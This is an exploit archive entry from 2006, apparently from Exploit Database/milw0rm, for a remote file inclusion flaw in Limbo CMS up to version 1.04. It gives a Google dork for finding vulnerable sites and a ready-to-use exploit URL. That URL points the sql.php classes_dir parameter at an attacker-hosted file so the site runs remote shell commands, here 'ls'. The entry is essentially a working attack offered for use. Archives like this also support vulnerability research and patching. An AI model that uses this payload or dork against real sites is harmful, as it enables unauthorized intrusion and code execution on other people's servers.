Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion

EDB-ID:

1729

Author:

[Oo]

Type:

webapps

Platform:

PHP

Published:

2006-04-29

Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]